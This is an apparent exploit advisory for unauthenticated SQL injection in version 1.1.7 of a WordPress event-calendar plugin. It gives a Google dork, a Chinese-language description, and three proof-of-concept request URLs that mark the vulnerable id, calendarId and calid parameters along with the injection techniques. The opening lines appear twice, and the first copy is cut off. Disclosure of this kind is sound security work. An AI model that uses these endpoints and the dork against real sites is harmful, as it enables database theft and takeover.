<p># Exploit Title: WordPress cp-multi-view-calendar.1.1.7 [Unauthenticated SQL injection vulnerabilities]</p><p># Date: 2015-07-10</p><p># Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar</p><p># Vendor Homepage: <a href="http://wordpress.dwbooster.com/" rel="nofollow">http://wordpress.dwbooster.com/</a></p><p># Software Link: <a href="https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.7.zip" rel="nofollow">https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.7.zip</a></p><p># Version: 1.1.7</p><p># Tested on: windows 7 + sqlmap 0.9. </p><p># OWASP Top10: A1-Injection</p><hr><p><b> 介绍:</b></p><p>WordPress CP Multi View Event Calendar Plugin(版本1.1.7)SQL注入漏洞。该漏洞允许远程攻击者注入自己的SQL命令控制受影响的Web应用程序和连接数据库。 SQL注入漏洞的位于<u></u><b>`edit.php` and `datafeed.php`</b> .攻击者可以注入自己的SQL命令GET / POST方法请求这些文件中的脆弱的参数。</p><p><br></p><p><b>POC:</b></p><pre...
<p># Exploit Title: WordPress cp-multi-view-calendar.1.1.7 [Unauthenticated SQL injection vulnerabilities]</p><p># Date: 2015-07-10</p><p># Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar</p><p># Vendor Homepage: <a href="http://wordpress.dwbooster.com/" rel="nofollow">http://wordpress.dwbooster.com/</a></p><p># Software Link: <a href="https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.7.zip" rel="nofollow">https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.7.zip</a></p><p># Version: 1.1.7</p><p># Tested on: windows 7 + sqlmap 0.9. </p><p># OWASP Top10: A1-Injection</p><hr><p><b> 介绍:</b></p><p>WordPress CP Multi View Event Calendar Plugin(版本1.1.7)SQL注入漏洞。该漏洞允许远程攻击者注入自己的SQL命令控制受影响的Web应用程序和连接数据库。 SQL注入漏洞的位于<u></u><b>`edit.php` and `datafeed.php`</b> .攻击者可以注入自己的SQL命令GET / POST方法请求这些文件中的脆弱的参数。</p><p><br></p><p><b>POC:</b></p><pre class="">http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=[SQLi]</pre><p><br></p><blockquote><p>Vulnerable parameter: `id`</p><p>Explotation technique: blind (time-based) , union query based.</p></blockquote><p> </p><p>-------------------------------------------------------------------</p><p> </p><pre class="">http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=remove&rruleType=del_only&calendarId=[SQLi]</pre><p> </p><blockquote><p>Vulnerable parameter: `calendarId`</p><p>Explotation technique: blind (boolean based, time based), error based.</p></blockquote><p> </p><p>-----------------------------------------------------------------------</p><p> </p><pre class="">http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=adddetails&id=1&calid=[SQLi]</pre><p> </p><blockquote><p>Vulnerable parameter: `calid`</p><p>Explotation technique: blind (boolean based, time based)</p></blockquote><p><b><br></b></p><p> </p>
